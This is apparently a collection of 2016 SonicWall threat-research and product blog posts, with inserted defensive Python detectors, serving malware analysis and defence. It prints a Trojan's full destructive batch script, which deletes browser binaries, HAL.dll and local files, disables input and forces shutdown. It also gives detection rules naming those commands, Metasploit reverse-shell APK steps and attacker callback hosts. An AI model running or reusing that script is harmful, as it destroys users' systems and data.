Click-fraud Trojan deletes files and impairs systems (April 29th, 2016)

The Dell SonicWall Threats Research team has discovered a click-fraud Trojan that also deletes files and attempts to disable parts of the operating system. It appears to be poorly written and did not succeed in its intention to disable the mouse and keyboard on our test system. It is, however, able to delete files, kill explorer.exe and shut down the system.

Infection Cycle:

The Trojan drops the following file and runs it:

  • %USERPROFILE%\Local Settings\Temp\2.tmp\Virusok.bat

Virusok.bat is a Windows batch script containing the following instructions:

      @shift /0
      @echo off
      taskkill /im /f chrome.exe
      taskkill /im /f ie.exe
      taskkill /im /f firefox.exe
      taskkill /im /f opera.exe
      taskkill /im /f safari.exe
      del C:\Program Files\Google\Chrome\Appulcation\chrome.exe /q
      del C:\Program Files\Safari\safari.exe /q
      del C:\Program Files\Mozilla Firefox\firefox.exe /q
      del C:\Program Files\Opera\opera.exe /q
      del C:\Program Files\Internet Explorer\ie.exe /q
      start www.400kg.com
      rundll32 mouse,disable > nul
      rundll32 keyboard,disable > nul
      rundll32 user,disableoemlayer > nul
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Poulcies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f > nul
      taskkill /f /im explorer.exe > nul
      del: *.*/q > nul
      del %WinDir%\system32\HAL.dll/q > nul
      del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
      del "%SystemRoot%\Cursors\*.*" >nul
      shutdown -s -t 00 -c error > nul
      del %0

In addition to deleting driver.cab and hal.dll, it deletes all files in the directory it is run from, as instructed by this line of the batch script above:

      del: *.*/q > nul
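A static triage pass of the kind a responder might run over a dropped batch file, added here as an example (it is not SonicWall's signature or any code from the post). The rule names and the constructed sample script are this example's own assumptions; the rules key on the same commands Virusok.bat uses (system-file deletion, input disabling, the RestrictRun policy key, forced shutdown, self-deletion).

```python
import re

# Heuristic rules modelled on the commands in Virusok.bat. Each entry is
# (indicator, regex applied to one normalised batch line). The rule set is an
# assumption of this example, not a vendor signature. The RestrictRun rule
# anchors only on \Explorer\RestrictRun, so the misspelt parent key still fires.
DESTRUCTIVE_RULES = [
    ("kills_browser", re.compile(r"^taskkill\b.*\b(chrome|firefox|opera|safari|ie)\.exe", re.I)),
    ("deletes_browser_binary", re.compile(r"^del\b.*\\(chrome|firefox|opera|safari|ie)\.exe", re.I)),
    ("deletes_system_file", re.compile(r"^del\b.*(hal\.dll|driver\.cab|\\system32\\|\\cursors\\)", re.I)),
    ("wildcard_delete", re.compile(r"^del\b.*\*\.\*", re.I)),
    ("disables_input", re.compile(r"^rundll32\s+(mouse|keyboard|user),disable", re.I)),
    ("restricts_explorer", re.compile(r"^reg\s+add\b.*\\explorer\\restrictrun\b", re.I)),
    ("kills_explorer", re.compile(r"^taskkill\b.*\bexplorer\.exe", re.I)),
    ("forced_shutdown", re.compile(r"^shutdown\b.*\s[-/]s\b", re.I)),
    ("opens_url", re.compile(r"^start\s+(?:https?://)?(?:www\.)?[\w-]+(?:\.[\w-]+)*\.[a-z]{2,}", re.I)),
    ("self_delete", re.compile(r"^del\s+%0\b", re.I)),
]


def normalise(raw: str) -> str:
    """Strip echo suppression and a trailing 'nul' redirection so rules see the command."""
    line = raw.strip().lstrip("@").strip()
    return re.sub(r"\s*>\s*nul\s*$", "", line, flags=re.I)


def triage_batch(script: str) -> dict:
    """Map each fired indicator to the normalised lines that triggered it."""
    hits: dict = {}
    for raw in script.splitlines():
        line = normalise(raw)
        if not line or re.match(r"(?i)rem\b|::", line):   # skip blanks and comments
            continue
        for name, rule in DESTRUCTIVE_RULES:
            if rule.search(line):
                hits.setdefault(name, []).append(line)
    return hits


def is_wiper_like(hits: dict) -> bool:
    """Destroys files the OS needs to boot or run, then forces a shutdown."""
    destroys = {"deletes_system_file", "wildcard_delete"} & hits.keys()
    return bool(destroys) and "forced_shutdown" in hits


# Constructed sample resembling the script above (not the original file).
SAMPLE_BAT = r"""@echo off
taskkill /im /f chrome.exe
del C:\Program Files\Mozilla Firefox\firefox.exe /q
start www.example.invalid
rundll32 mouse,disable > nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f > nul
taskkill /f /im explorer.exe > nul
del: *.*/q > nul
del %WinDir%\system32\HAL.dll/q > nul
del "%SystemRoot%\Cursors\*.*" >nul
shutdown -s -t 00 -c error > nul
del %0
"""
# Constructed benign script: deletes a log in a temp directory, nothing more.
BENIGN_BAT = "@echo off\nrem clean up build output\ndel %TEMP%\\build.log /q\n"

if __name__ == "__main__":
    found = triage_batch(SAMPLE_BAT)
    for name, lines in found.items():
        print(f"{name:24s} {lines[0]}")
    print("wiper-like:", is_wiper_like(found))
```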

The Trojan causes the following DOS window to be displayed on the screen:

As instructed in the batch script, it opens Internet Explorer to display www.400kg.com as part of its click-fraud operation:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

      GAV: Reconyc.A_4 (Trojan)

The SonicWall Security Threat Report 2016: Highlighting Trends in Exploit Kits

In February, we released our SonicWall Security 2016 Threat Report, and one of its highlights was a discussion of the latest techniques and trends in exploit kits (EKs).

EKs have become a key tool for cybercriminals to take over target machines (via an exploit) and subsequently install malware of their choice.

For those with some background in researching EKs, the stages will seem familiar. First, there is a redirection stage, which leads the user to the landing page of the EK (either directly or via an infected website). This redirection can result from a URL link in a spam email or Twitter/Facebook feed, an advertising banner redirection (malvertising), or simply an IFRAME redirection from an infected website.

Next is the landing stage. Here, the target visits the actual web server where the EK software resides (i.e., the landing page), and the exploit is delivered.

During exploitation, carefully crafted scripts determine the software components installed on the victim's machine (in order to select an appropriate exploit first). The targeted exploit is then delivered and, if it succeeds, malware is installed on the target machine.

Some of the stages described above can be illustrated using the Spartan EK, discovered by the SonicWall Threat Research team last year.

As you may note in Spartan's delivery technique, the initial Flash file was encrypted, and the actual exploit code resided only in memory and was never written to disk (thus avoiding potential detection by AV software).

EK delivery mechanisms are evolving, and require security vendors to keep up with the latest evasion techniques in order to successfully detect and/or prevent the attacks. It is not uncommon for an EK to check for the presence of certain AV software or a virtualized environment during the exploit stage, and to abort its execution to avoid exposing itself to security professionals (see example code below).

For example, last year we observed the Magnitude EK using steganography during the redirection stage to dynamically generate an IFRAME from an encrypted/encoded image file. Such techniques make it more difficult for the affected website owner to identify a potential website infection.

In addition, landing page URLs undergo periodic modification to avoid detection by security vendors; we have observed landing page URL patterns change within 48 hours for certain EKs. The landing page's software component detection techniques have changed as well: unlike in the past, we have observed EKs that can determine the browser/component versions running on target systems without using the JavaScript PluginDetect library.

What conclusions can security product designers draw from the latest trends in EKs? For one, given the exploit and malware payload obfuscation in the latest exploit delivery techniques, it is now more important to quickly and correctly identify EK landing page access, and to stop the exploit delivery immediately at the point where the user reaches the landing page. Tracking EKs and their latest attack techniques is therefore an important part of any threat research team's activity.

Download the SonicWall Security Annual Threat Report today.

Jigsaw Ransomware spotted in the wild (April 22, 2016)

The Dell SonicWall Threats Research team has received reports of a new ransomware Trojan, Jigsaw (named after the fictional character), which encrypts the system's files and also deletes them if the payment is not made on time.

Infection cycle:

The Trojan poses as Firefox with the following properties:

The Trojan adds the following files to the filesystem:

  • %APPDATA%\Roaming\Frfx\firefox.exe (copy of original) [Detected as GAV: Jigsaw.A (Trojan)]

The Trojan creates the following key in the Windows registry to enable startup after reboot:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "%APPDATA%\Roaming\Frfx\firefox.exe"
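An added example (not from the post) of checking HKCU Run entries for this persistence pattern: a browser-named executable launched from outside a normal install root. The entry list, environment values and `TRUSTED_ROOTS` are constructed assumptions; on Windows the optional `read_run_key()` reads the live key.

```python
import ntpath
import re
import sys

BROWSER_NAMES = {"firefox.exe", "chrome.exe", "iexplore.exe", "opera.exe", "safari.exe"}
# Assumed install roots of a genuine browser; a browser-named binary elsewhere is suspect.
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")


def expand_env(path: str, env: dict) -> str:
    """Expand %VAR% tokens from a supplied mapping so this runs offline on any OS."""
    return re.sub(r"%([^%]+)%", lambda m: env.get(m.group(1).upper(), m.group(0)), path)


def executable_of(command: str) -> str:
    """Pull the program path out of a Run-key command line, quoted or not."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    m = re.match(r"(.+?\.exe)\b", command, re.I)
    return m.group(1) if m else command.split()[0]


def suspicious_entries(entries, env):
    """entries: iterable of (value_name, command). Returns [(name, resolved path, reason)]."""
    flagged = []
    for name, command in entries:
        path = expand_env(executable_of(command), env)
        base = ntpath.basename(path).lower()
        if base in BROWSER_NAMES and not path.lower().startswith(TRUSTED_ROOTS):
            flagged.append((name, path, "browser-named binary outside a trusted install root"))
    return flagged


def read_run_key():
    """Live collection of HKCU Run values on Windows; returns [] on other platforms."""
    if sys.platform != "win32":
        return []
    import winreg
    entries, i = [], 0
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                        r"Software\Microsoft\Windows\CurrentVersion\Run") as key:
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, i)   # raises OSError past the last value
            except OSError:
                break
            entries.append((name, str(value)))
            i += 1
    return entries


# Constructed sample data: the first entry is modelled on the Jigsaw value above.
SAMPLE_ENV = {"APPDATA": r"C:\Users\alice\AppData\Roaming", "PROGRAMFILES": r"C:\Program Files"}
SAMPLE_ENTRIES = [
    ("firefox", r'"%APPDATA%\Frfx\firefox.exe"'),
    ("OneDrive", r'"%PROGRAMFILES%\Microsoft OneDrive\OneDrive.exe" /background'),
    ("Updater", r"C:\Program Files\Mozilla Firefox\firefox.exe -silent"),
]

if __name__ == "__main__":
    for name, path, reason in suspicious_entries(read_run_key() or SAMPLE_ENTRIES, SAMPLE_ENV):
        print(f"{name}: {path} ({reason})")
```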

It displays the following iconic image and message while encrypting the files:

It starts a countdown and threatens to delete the listed files each hour.

The Trojan finds the following files on the victim's machine and encrypts them:

Before encrypting, it copies the filenames to the following location:

It encrypts all the victim's files listed above, adding the .fun extension.

When trying to close the ransom window, it displays the following message:

It checks for payment by contacting the C&C server:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Jigsaw.A (Trojan)

Apple Quicktime Memory Corruption Vulnerability (Apr 21, 2016)

Apple QuickTime is an extensible multimedia framework, capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. QuickTime is bundled with OS X. QuickTime for Microsoft Windows is downloadable as a standalone installation. Apple ended support for QuickTime for Windows this year, and the last security update was released in January 2016.

A memory corruption vulnerability was found in QuickTime that allows remote attackers to execute arbitrary code or cause a denial of service via a crafted Photoshop file. The vulnerability is identified as CVE-2016-1769. A security patch was released for OS X El Capitan v10.11 to v10.11.3. For QuickTime on Windows, however, remove the application to eliminate the possibility of being attacked.

The Dell SonicWALL research team has investigated this vulnerability and released the following signature to protect customers:

  • SPY: 4493 Malformed-File psd.TL.1

How to Open Your Own Department of Yes

Securing large organizations is a massively complex task. There are so many different domains of security to think about, it can drive a person crazy. Fortunately, as we work closely with our customers and partners, we have the opportunity to see and address many of these challenges. We share what we learn with the security community to show them how to think about identity and access management (IAM) and network security in a unified way to get more out of each solution without incurring more cost. We are on a mission to help CISOs open their very own “Department of Yes.” The goal is to help them see how IAM and network security can be business enablers.

For example, with SonicWall IAM and network security solutions working together, a policy on the next-generation firewall can help enforce an application governance policy defined in the IAM solution. SonicWall next-generation firewalls can be easily integrated with SonicWall One Identity Safeguard for Privileged Passwords to help tighten up security of the most trusted assets in any organization. Cloud Access Manager can consume data from the firewall to require elevated authentication. These are just a few examples of what we can do today and there will be more integration in the future that will help the CISO say yes more often.

On Monday, Curtis Hutcheson, VP and GM of SonicWall Security Solutions, discussed in his blog the importance of becoming the Department of Yes. Curtis discussed our new approach to IT security, Govern and Protect, where our network-aware identity solutions and our identity-aware network solutions work together to enable organizations to take advantage of better security with less complexity and lower costs. By becoming the Department of Yes, the security team can now easily embrace new, innovative initiatives such as moving to the cloud, BYOD, digital transformation, the internet of things and more.

By governing every identity across the organization with our identity governance, privileged management and access management while inspecting every packet with our next-gen firewalls, secure mobile access, and email security, IT organizations no longer need to say no to supporting new strategic business initiatives.

We believe that our customers should be able to deploy strong identity and access management in concert with robust network security solutions where the two reinforce each other. By making the network security solution identity-aware and the identity management solution network-aware, we can now deliver superior protection and governance while lowering costs.

For more information on how you can open your own Department of Yes, be sure to check out this new SonicWall Security web site.

Is Your CISO Organization the Department of Yes? SonicWall Security Delivers

Businesses are ramping technology investments and capabilities faster than ever. Employees, customers and partners are accessing more applications and data every day. These investments drive enormous value to the business, but also create IT complexity and security vulnerabilities.

Our customers and partners constantly ask us to help them rise to these challenges, to help them deliver innovative initiatives and improve collaboration, while protecting their company. Often, the security risks around these new applications, projects and technologies force IT to say “NO” to their business partners.

To change this model, we have invested in SonicWall and SonicWall One Identity solutions to help organizations become more innovative and create competitive advantages by driving initiatives such as:

  • Leading your organization to the cloud
  • Deploying BYOD across your organization
  • Enabling a digital transformation
  • Completing stress-free audits

We feel that it’s time for a radically different point of view, and SonicWall Security’s context-aware, integrated security solutions put us in the unique position to offer organizations the security they need in today’s complex IT environment. SonicWall and SonicWall One Identity enable CISOs to govern every identity and inspect every packet, effectively identifying and isolating rogue activity while letting acceptable traffic flow.

These network inspection and identity governance capabilities give organizations the ability to confidently push beyond traditional boundaries while controlling vulnerabilities. We are empowering IT teams to deliver the strategic projects and capabilities that drive your business forward while providing the security you need.

We want to enable the IT security team to become the Department of “Yes.”

SonicWall and One Identity solutions reinforce each other to ensure we’re setting the highest bar for value to our partners and customers.

We’ve created this extensive security portfolio to enable you to:

  • Not only detect but also block advanced threats at the gateway before they get into your network, with extremely low latency
  • Automatically allow or deny, or step up authentication for, every user access attempt based on context derived from the network to identify abnormal activity
  • Provision a new employee, partner or contractor in 15 minutes across your enterprise, and de-provision them 15 minutes after they depart
  • Leverage Privileged Account Management controls like password vaulting and session management for those identities who have the “keys to the kingdom”

As we lead in the market with our innovative solutions, we can help you attain true governance of user and admin access to your network, applications and data and deeper security without compromising performance. We are committed to do all of this, effectively raising productivity and security, without increasing your costs.

For more information on how to become the Department of Yes, explore our new SonicWall Security web site.

Metasploit enhanced Android malware spotted in the wild (April 15, 2016)

Metasploit is one of the most widely used penetration testing tools for testing and improving the defenses of internet-facing services. It boasts more than 1300 exploits, and new ones are added at regular intervals thanks to the strong community that backs these efforts. Metasploit contains a number of different modules that cater to different requirements: for instance, exploits focus on a particular weakness, whereas payloads consist of code that runs remotely.

Android has enjoyed popularity among mobile phone users, but at the same time there have been many security concerns regarding malware and other vulnerabilities. Metasploit developers saw this as a new avenue for research and introduced support for generating Android-specific payloads. Using these payloads, an attacker can run myriad commands on a victim's Android device, provided a modified APK (Android Package) with Metasploit modules is present on the target.

The Dell SonicWALL Threats Research team recently observed a slew of Android malware containing Metasploit-specific components. This might indicate a new wave of Metasploit-based Android malware that will become commonplace in the near future.

Metasploit for Android

Using Metasploit it is possible to gain shell access on a target device, which allows the attacker to perform a number of operations; additionally, if the device is rooted, the attacker can make system-level changes as well. The following high-level steps are involved in creating a malicious, Metasploit-modified APK to compromise a victim's device:

  • The msfvenom module is used to modify a clean APK and add a reverse TCP component to it
  • Reverse TCP makes the malicious APK initiate a connection back to the attacker, who runs a listener for incoming connections
  • Once the device is infected with this modified APK, it connects back to the attacker with a shell, which potentially gives them unlimited access

In the past few weeks we observed a number of malicious APKs with a Metasploit reverse TCP component present in them. The image below shows the code for three APKs: the first is a clean, unmodified APK, the second is a clean APK that we modified using the msfvenom module, and the last is a malicious APK that we obtained:



We can see that the code for the modified APK and the malicious APK is strikingly similar, which indicates that the attacker has been using the same Metasploit module for this modification.

A callback address needs to be specified in the case of reverse TCP. The following is a subset of the IPs we observed in malicious APKs during our analysis:


Some of the IPs belong to the 192.168 block; in such cases it is possible that an infected private server forwards the data back to the attacker. Most of the malicious APKs we observed were standalone APKs containing only the Metasploit modules; however, we did see two cases where the Metasploit module was bundled with a separate, fully working APK. In these cases the Metasploit module runs in the background while the original APK keeps running in the foreground, so the victim is oblivious to the fact that the attacker has gained an open shell to their device.
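An added triage heuristic, not code from the post or from Metasploit: it looks for the `com/metasploit/stage` class path (the package name noted later in this post) in an APK's dex and pulls out host:port strings, classifying each the way the paragraph above does (private or loopback versus public). The assumption that the callback survives as a printable `host:port` string, the constructed in-memory APK and the sample endpoints are all this example's own.

```python
import io
import ipaddress
import re
import zipfile

# Class-path form of the package name seen in the samples (com.metasploit.stage).
STAGE_MARKER = b"com/metasploit/stage"
# Assumption of this example: the callback is present in the dex string data as a
# printable host:port (optionally tcp://-prefixed), which is what the regex hunts for.
ENDPOINT_RE = re.compile(
    rb"(?:tcp://)?((?:\d{1,3}\.){3}\d{1,3}|[a-z0-9][a-z0-9.-]+\.[a-z]{2,}):(\d{2,5})", re.I)


def classify(host: str) -> str:
    """Private or loopback callbacks suggest a lab box or an intermediate forwarder."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"
    if ip.is_loopback:
        return "loopback"
    return "private" if ip.is_private else "public"


def triage_apk(apk_bytes: bytes) -> dict:
    """Report whether the Metasploit stage marker is present and any callback endpoints found."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
        dex = b"".join(z.read(n) for n in names if n.endswith(".dex"))
        manifest = z.read("AndroidManifest.xml") if "AndroidManifest.xml" in names else b""
    # Real manifests are binary XML with a UTF-16LE string pool, so check both encodings.
    pkg = b"com.metasploit.stage"
    stage = STAGE_MARKER in dex or pkg in manifest or pkg.decode().encode("utf-16-le") in manifest
    seen: dict = {}
    for host, port in ENDPOINT_RE.findall(dex):
        h = host.decode("ascii", "replace")
        seen.setdefault((h, int(port)), classify(h))      # de-duplicate, keep first-seen order
    return {"metasploit_stage": stage,
            "callbacks": [(h, p, kind) for (h, p), kind in seen.items()]}


def build_sample_apk(endpoints):
    """Constructed stand-in for an APK: a zip with a fake classes.dex and a plain-text manifest.
    Real dex and manifest files are binary; only the embedded strings matter to this heuristic.
    endpoints=None builds a benign package."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        if endpoints is None:
            z.writestr("AndroidManifest.xml", "<manifest package='com.example.notes'/>")
            z.writestr("classes.dex", b"dex\n035\x00Lcom/example/notes/MainActivity;\x00")
        else:
            z.writestr("AndroidManifest.xml", "<manifest package='com.metasploit.stage'/>")
            strings = b"\x00".join(b"tcp://" + e.encode() for e in endpoints)
            z.writestr("classes.dex",
                       b"dex\n035\x00Lcom/metasploit/stage/Payload;\x00" + strings + b"\x00")
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_apk(build_sample_apk(["192.168.1.2:4444", "8.8.8.8:443"])))
    print(triage_apk(build_sample_apk(None)))
```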

The following figure shows code for the malicious APKs with bundled Metasploit modules:


As we can see, both APKs have similar Metasploit components along with the other class files that make up the APK. The callback addresses specified in these two APKs are listed below; at the moment VirusTotal deems these links clean:

  • security-checks.de
  • 92.97.176.17

Using Metasploit as a component of a malicious APK might become more common as time passes, but for now this campaign still looks to be in its early stages. As mentioned before, this attack has tremendous impact on rooted devices, as it would allow the attacker to make system-level changes. This further highlights the dangers of rooting an Android device.

Another good precaution is to use security tools like OS Monitor to check for open connections on the device. A vigilant eye can catch connections opened by unknown apps, as shown below:

A few MD5s with the package name com.metasploit.stage:


MD5s with a Metasploit component in a working APK:

  • 3763b28338dff3f703a8192eff0f1c82 – com.thepapership.braingames.espanol
  • f36704560abc8172433820ecabcef76a – com.piriform.ccleaner

Dell SonicWALL provides protection against multiple versions of this threat via the following signature:

  • GAV: AndroidOS.Metasploit.PL (Trojan)

Protect Remote Workforce Anywhere, Anytime on Any Device

Every day we hear terrifying headlines such as this one: 27 million doctors’ mobile devices at high risk of malware. Our recent SonicWall Threat Report confirms the increase in malware targeting Android devices. Fortunately, today we are announcing our latest SonicWall Secure Mobile Access 11.4 OS and the SMA 1000 Series to arm your IT organization with greater security, scalability and the ability to abide by compliance standards. With this launch, we deliver more power and speed to remote workers to securely access corporate data via policy-based access on any mobile device.

Our new SonicWall SMA 11.4 offers numerous state-of-the-art features. The dynamic Global Traffic Optimizer (GTO) will enable thousands of concurrent users to have protected remote access capabilities. Our new Regulatory Compliance standards meet the strictest security requirements of the latest government regulations. The innovative Management API will deliver enhanced workflow, and the SAML 2.0 support will save valuable remote workforce time. Enterprises like the NFL-champion Denver Broncos are using SonicWall Secure Mobile Access (SMA). I hope you will explore what this solution can do for you and your mobile strategy.

“We increased our return on investment by using SonicWall SRA with SuperMassive next-gen firewall because we offload VPN traffic from our main firewall to the SRA.” Russ Trainor, vice president of Technology, Denver Broncos.

Secure Mobile Access (SMA) 1000 11.4 OS brings the following additional functionality enhancements to this series.

  • Global Traffic Optimizer (GTO) – provides a turnkey approach to delivering massive global scalability of concurrent users while continuing to maintain secure access. This allows customers to better address secure access of data as they face an ever-growing workforce, company expansion to different locations both within country and globally, and proliferation of device types used by workers.
  • Regulatory Compliance – ensures security compliance with the most stringent industry and government regulations, like “Federal Information Processing Standards” (FIPS) and Suite B cipher support. This is crucial in highly regulated organizations to maintain compliance (e.g., Government, Financial, Healthcare, etc.).
  • Management API – gives access to SonicWall’s SMA API. This enables enhanced workflow, orchestration and automation, improving customers’ operational processes, increasing productivity and reducing costs.
  • Enhanced SAML 2.0 support – creates a great end-user experience by allowing Single Sign-On (SSO), eliminating individual sign-on to SaaS applications. This saves the time previously spent logging onto multiple applications, one at a time.

These key innovations are critical because mobile users are often using the same device for both business and personal tasks. Consequently, businesses are at a growing risk of multiple security breaches such as:

  • Unauthorized users gaining access to company networks and systems from lost or stolen devices
  • Malware-infected devices acting as a conduit to infect company systems
  • Interception of company data “in-flight” on unsecured public Wi-Fi networks
  • Loss of business data stored on devices if rogue personal apps or unauthorized users gain access

SonicWall’s Secure Mobile Access (SMA) portfolio solves these problems our customers are facing by providing mobile and remote workers using smart phones, tablets or laptops (whether managed or unmanaged) with policy-enforced SSL VPN access to mission-critical applications, data and resources without compromising security.

In case you missed this, the following key functionality enhancements have already been added across the SMA 1000 line and are especially noteworthy: Centralized Management System (CMS), HTML Clients and Proxies, and Personal Device Authorization.

This entire impressive operating system runs on the SonicWall SMA 1000 Series Models: SRA EX6000, SMA 6200, SMA 8200V (Virtual Appliance), SRA EX7000, SMA 7200, and SRA EX9000.

Our customers are already benefiting from these powerful anytime, anywhere on any device security solutions.

“With SonicWall, we can stay at the forefront of this changing landscape. We have a great business relationship with SonicWall, and its customer service and engineering support was outstanding,” said our customer C.J. Daab, Technology Support Coordinator, Hall County School.

Learn more in the SonicWall Secure Mobile Access data sheet.

Badlock: Windows SAM and LSAD Downgrade Vulnerability

An elevation of privilege vulnerability exists in the Security Account Manager (SAM) and Local Security Authority (Domain Policy) (LSAD) remote protocols. Both Microsoft Windows and Samba are vulnerable to these attacks. The vulnerability is triggered when these protocols accept authentication levels that do not protect them adequately. It is caused by the way the SAM and LSAD remote protocols establish the Remote Procedure Call (RPC) channel. An attacker who successfully exploited this vulnerability could gain access to the SAM database. To exploit the vulnerability, an attacker could launch a man-in-the-middle (MITM) attack, force a downgrade of the authentication level of the SAM and LSAD channels, and then impersonate an authenticated user. The attacker can access domain passwords as well. The security update addresses the vulnerability by modifying how the SAM and LSAD remote protocols handle authentication levels.

There are two different CVE identifiers associated with this vulnerability:

  • Microsoft: CVE-2016-0128
  • SAMBA: CVE-2016-2118

In addition, the vulnerability is known as ‘Badlock’.

Microsoft has two protocols that are vulnerable to this attack:

  • Security Account Manager Remote Protocol (SAMR): This protocol provides management functionality for the user account store and for user/group directories.
  • Local Security Authority (Domain Policy) Remote Protocol (LSAD): This protocol provides management functionality for the user account store and for user/group directories.

These protocols maintain the security account manager database. They are supported by both Windows and Samba, and they support all domain profiles.
In addition, the following Samba protocols are susceptible to this vulnerability:

  • Directory Replication Service Remote Protocol (DRSR): RPC protocol for replication and management of data in Active Directory
  • BackupKey Remote Protocol (BKRP): Encrypts and decrypts sensitive data (such as cryptographic keys)

Attack mechanism:

There are six authentication levels (auth levels), as described in the DCERPC protocol; ‘1’ is the lowest and ‘6’ the highest:

Example of an attack scenario:

  • 1: The client sends a bind request to the server with the highest security level, ‘6’.
  • 2: The MITM intercepts this request and changes the value from ‘6’ to ‘2’.
  • 3: The server responds with auth level ‘2’ instead.

The attacker thus lowers the auth level to ‘2’. Level ‘2’, as shown earlier, provides minimal authentication; note that it does not protect the messages transferred between the client and the server. This is an ideal scenario for an attacker: with it, the attacker can achieve read/write access to the SAMR services and potentially obtain passwords and other sensitive information.
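An added example (not SonicWall's signature or any code from the post) of the check a network sensor would make for the downgrade described above: parse the sec_trailer of a DCERPC bind and its bind_ack and compare the auth levels. The PDU layout follows the DCE 1.1 RPC common header and the MS-RPCE sec_trailer; the constructed PDUs, the SPNEGO auth_type value and the `floor` parameter are this example's assumptions.

```python
import struct

# MS-RPCE authentication levels: 1 is the weakest, 6 the strongest.
AUTH_LEVELS = {1: "NONE", 2: "CONNECT", 3: "CALL", 4: "PKT", 5: "PKT_INTEGRITY", 6: "PKT_PRIVACY"}
PTYPE_BIND, PTYPE_BIND_ACK = 11, 12
HEADER_LEN, SEC_TRAILER_LEN = 16, 8      # common header; auth_type,level,pad_len,reserved,context_id


def build_pdu(ptype: int, auth_level: int, call_id: int = 1, auth_type: int = 9) -> bytes:
    """Construct a minimal connection-oriented PDU carrying a sec_trailer (auth_type 9 = SPNEGO)."""
    body = b"\x00" * 8                   # stand-in for the bind/bind_ack body (constructed)
    auth_value = b"\x00" * 4             # stand-in for the security token (constructed)
    trailer = struct.pack("<BBBBI", auth_type, auth_level, 0, 0, 0)
    frag_len = HEADER_LEN + len(body) + SEC_TRAILER_LEN + len(auth_value)
    header = struct.pack("<BBBB4sHHI", 5, 0, ptype, 0x03, b"\x10\x00\x00\x00",
                         frag_len, len(auth_value), call_id)
    return header + body + trailer + auth_value


def parse_pdu(pdu: bytes) -> dict:
    """Return ptype, call_id and the auth_level from the sec_trailer (None if there is none)."""
    if len(pdu) < HEADER_LEN:
        raise ValueError("short PDU")
    ver, _minor, ptype, _flags = struct.unpack_from("<BBBB", pdu, 0)
    end = "<" if pdu[4] & 0x10 else ">"  # first drep byte selects integer byte order
    frag_len, auth_len, call_id = struct.unpack_from(end + "HHI", pdu, 8)
    if ver != 5 or frag_len != len(pdu):
        raise ValueError("bad header or truncated fragment")
    level = None
    if auth_len:
        off = frag_len - auth_len - SEC_TRAILER_LEN   # sec_trailer sits just before auth_value
        if off < HEADER_LEN:
            raise ValueError("sec_trailer overlaps header")
        _auth_type, level, _pad, _rsvd, _ctx = struct.unpack_from(end + "BBBBI", pdu, off)
    return {"ptype": ptype, "call_id": call_id, "auth_level": level}


def detect_downgrade(bind: bytes, bind_ack: bytes, floor: int = 6) -> dict:
    """Compare the level the client asked for with the level the server granted."""
    req, resp = parse_pdu(bind), parse_pdu(bind_ack)
    if (req["ptype"], resp["ptype"]) != (PTYPE_BIND, PTYPE_BIND_ACK) or req["call_id"] != resp["call_id"]:
        raise ValueError("not a matching bind/bind_ack pair")
    requested = req["auth_level"] or 1   # no sec_trailer at all means NONE
    granted = resp["auth_level"] or 1
    name = lambda lvl: AUTH_LEVELS.get(lvl, f"unknown({lvl})")
    return {"requested": name(requested), "granted": name(granted),
            "downgraded": granted < requested, "below_floor": granted < floor}


if __name__ == "__main__":
    # Constructed exchange mirroring the scenario above: client asks for 6, server answers 2.
    print(detect_downgrade(build_pdu(PTYPE_BIND, 6), build_pdu(PTYPE_BIND_ACK, 2)))
```

A sensor on the server side only sees the already-modified bind, so for SAMR/LSAD the `below_floor` verdict (anything under PKT_PRIVACY) matters as much as `downgraded`, which only a client-side vantage point can observe.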

Dell SonicWall has written the following signatures to protect our customers from this issue. They will be available in today’s (04/12/2016) release.

  • 11560: BadLock Vulnerability
  • 11555: DCERPC AuthLevel Downgrade

Microsoft Security Bulletin Coverage (Apr 12, 2016)

Dell SonicWALL has analyzed and addressed Microsoft’s security advisories of Apr. 12, 2016. A list of the issues reported, along with Dell SonicWALL coverage information, follows:

MS16-037 Cumulative Security Update for Internet Explorer

  • CVE-2016-0154 Microsoft Browser Memory Corruption Vulnerability
    IPS:11559 "Microsoft Browser Memory Corruption Vulnerability (MS16-037)"
  • CVE-2016-0159 Internet Explorer Memory Corruption Vulnerability
    IPS:11557 "Internet Explorer Memory Corruption Vulnerability (MS16-037) 1"
  • CVE-2016-0160 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0162 Internet Explorer Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0164 Internet Explorer Memory Corruption Vulnerability
    IPS: 11558 “Internet Explorer Memory Corruption Vulnerability (MS16-037) 2”
  • CVE-2016-0166 Internet Explorer Memory Corruption Vulnerability
    There are no known exploits in the wild.

MS16-038 Cumulative Security Update for Microsoft Edge

  • CVE-2016-0154 Microsoft Browser Memory Corruption Vulnerability
    IPS:11559 "Microsoft Browser Memory Corruption Vulnerability (MS16-037)"
  • CVE-2016-0155 Microsoft Edge Memory Corruption Vulnerability
    SPY:4382 "Malformed-File exe.MP.13"
  • CVE-2016-0156 Microsoft Browser Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2016-0157 Microsoft Edge Memory Corruption Vulnerability
    IPS: 11550 “Microsoft Edge Memory Corruption Vulnerability (MS16-038) 2”
  • CVE-2016-0158 Microsoft Edge Elevation of Privilege Vulnerability
    IPS: 11551 “Microsoft Edge Memory Corruption Vulnerability (MS16-038) 3”
  • CVE-2016-0161 Microsoft Edge Elevation of Privilege Vulnerability
